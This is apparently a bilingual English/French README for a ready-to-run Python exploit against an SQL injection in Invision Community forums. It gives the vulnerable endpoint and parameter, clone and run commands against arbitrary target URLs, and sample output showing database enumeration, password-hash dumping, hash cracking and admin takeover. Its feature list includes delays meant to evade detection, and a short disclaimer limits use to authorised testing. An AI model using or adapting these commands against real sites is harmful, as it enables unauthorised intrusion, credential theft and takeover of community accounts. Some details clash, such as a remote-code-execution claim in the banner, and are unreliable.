
CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna
CVE-2025-48932 est une vulnérabilité critique d'injection SQL aveugle non authentifiée découverte dans Invision Community versions ≤ 4.7.20. Cet exploit permet aux attaquants distants de :
$ python3 exploit.py -u https://vulnerable-site.com -v
╔══════════════════════════════════════════════════════════════════╗
║ CVE-2025-48932 - Invision Community SQL Injection ║
║ Author: Sudeepa Wanigarathna ║
║ Critical: Unauthenticated Remote Code Execution ║
╚══════════════════════════════════════════════════════════════════╝
[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!
[*] Enumerating database information...
[+] Database Information:
Version: 10.4.32-MariaDB
User: invision@localhost
Database: invision_community
Hostname: localhost
Basedir: /usr/
Datadir: /var/lib/mysql/
[*] Enumerating databases...
[+] Found 5 databases
Found: information_schema
Found: invision_community
Found: mysql
Found: performance_schema
Found: phpmyadmin
[*] Enumerating tables in invision_community...
[+] Found 12 tables
Found: core_members
Found: core_sessions
Found: admin_members
Found: cms_categories
Found: forums_posts
...
[*] Searching for credentials...
[+] Found credential table: core_members
Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...
[*] Extracting admin information...
[+] Admin Information Found:
name: admin
email: [email protected]
id: 1
password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...
[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!
[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!
[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json
{
"target": "https://vulnerable-site.com",
"timestamp": "2026-08-02T12:34:56.789Z",
"vulnerable": true,
"database": {
"version": "10.4.32-MariaDB",
"user": "invision@localhost",
"database": "invision_community",
"hostname": "localhost"
},
"databases": [
"information_schema",
"invision_community",
"mysql",
"performance_schema",
"phpmyadmin"
],
"tables": [
"core_members",
"core_sessions",
"admin_members"
],
"credentials": [
{
"username": "admin",
"password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
"email": "[email protected]"
}
],
"admin_info": {
"name": "admin",
"email": "[email protected]",
"id": "1",
"password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
},
"summary": {
"total_databases": 5,
"total_tables": 12,
"total_credentials": 3,
"vulnerable": true,
"successful": true
}
}
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit
# No dependencies to install! Just run it.
# Check if target is vulnerable
python3 exploit.py -u https://example.com --check-only
# Full exploitation with verbose output
python3 exploit.py -u https://example.com -v
# With proxy (Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v
# Save results to custom file
python3 exploit.py -u https://example.com -o results.json
# Multi-threaded extraction (faster)
python3 exploit.py -u https://example.com -t 10
# Dump all available data
python3 exploit.py -u https://example.com --dump-all
# With custom wordlist for password cracking
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v
# Silent mode (no output, just report)
python3 exploit.py -u https://example.com -o silent_report.json
# Debug mode with detailed errors
python3 exploit.py -u https://example.com -v --debug
✅ No external dependencies!
✅ Pure Python standard library only!
✅ No pip install or virtual environment needed!
# Download popular wordlist
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
/applications/calendar/modules/front/calendar/view.phpIPS\calendar\modules\front\calendar\view::search()location (entrée fournie par l'utilisateur)GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]
Cet outil est destiné uniquement à des fins ÉDUCATIVES et de TEST AUTORISÉ.
En utilisant cet outil, vous acceptez de :
L'accès non autorisé à des systèmes informatiques est illégal et contraire à l'éthique.
invision_exploit_report_[timestamp].json
├── target # Target URL
├── timestamp # Exploit timestamp
├── vulnerable # Vulnerability status
├── database # Database information
├── databases # List of databases
├── tables # List of tables
├── credentials # Extracted credentials
├── admin_info # Admin user information
└── summary # Exploitation summary
Problème : Délai de connexion dépassé
# Solution: Increase timeout or check network
python3 exploit.py -u https://example.com --timeout 60
Problème : Erreurs de certificat SSL
# Solution: Disable SSL verification (not recommended for production)
python3 exploit.py -u https://example.com --no-verify-ssl
Problème : Limitation de débit détectée
# Solution: Reduce threads and increase delays
python3 exploit.py -u https://example.com -t 2 --delay 2
Problème : Aucun paramètre vulnérable trouvé
# Solution: Ensure calendar app is installed and GeoLocation is enabled
# Check: /applications/calendar/modules/front/calendar/view.php exists
Nous accueillons volontiers les contributions ! Veuillez consulter nos Directives de contribution.
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)Chercheur en sécurité et chasseur de bugs bounty
Ce projet est sous licence MIT — voir le fichier LICENSE pour plus de détails.
MIT License
Copyright (c) 2026 Sudeepa Wanigarathna
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Si ce projet vous a aidé ou vous a intéressé :
Chercheur en cybersécurité | Ingénieur logiciel | Ingénieur CTF
Ce projet est fourni pour la recherche en sécurité, l'analyse défensive et les tests d'intrusion autorisés. Les utilisateurs sont responsables du respect de toutes les lois applicables et de l'obtention d'une autorisation appropriée avant toute utilisation.
| Fonctionnalité | Description | Statut |
|---|
| 🚀 Zéro dépendance | Bibliothèque standard Python pure - aucune installation pip requise | ✅ |
| ⚡ Multithreadé | Extraction de données ultra-rapide avec threads configurables | ✅ |
| 🤖 Entièrement automatisé | Chaîne d'exploitation complète, de la détection au rapport | ✅ |
| 👑 Prise de contrôle admin | Détournement de session et élévation de privilèges | ✅ |
| 🔑 Extraction d'identifiants | Extraire les utilisateurs, les hachages de mots de passe, les e-mails | ✅ |
| 🔓 Cassage de mots de passe | Cassage de hachages intégré avec prise en charge des wordlists | ✅ |
| 📋 Rapports JSON | Sortie structurée pour l'analyse et la documentation | ✅ |
| 🔌 Prise en charge des proxys | Intégration Burp Suite et proxy personnalisé | ✅ |
| 🎨 Sortie colorée | Sortie terminal élégante avec indicateurs de progression | ✅ |
| 🛡️ Limitation de débit | Délais intégrés pour éviter la détection | ✅ |
| Argument | Description | Exemple |
|---|
-u, --url | URL cible (requis) | -u https://example.com |
-p, --proxy | URL du proxy | -p http://127.0.0.1:8080 |
-t, --threads | Nombre de threads (défaut : 5) | -t 10 |
-o, --output | Fichier de sortie pour les résultats | -o results.json |
-v, --verbose | Activer la sortie détaillée | -v |
--check-only | Vérifier uniquement la vulnérabilité | --check-only |
--dump-all | Extraire toutes les données disponibles | --dump-all |
--wordlist | Fichier wordlist pour le cassage | --wordlist rockyou.txt |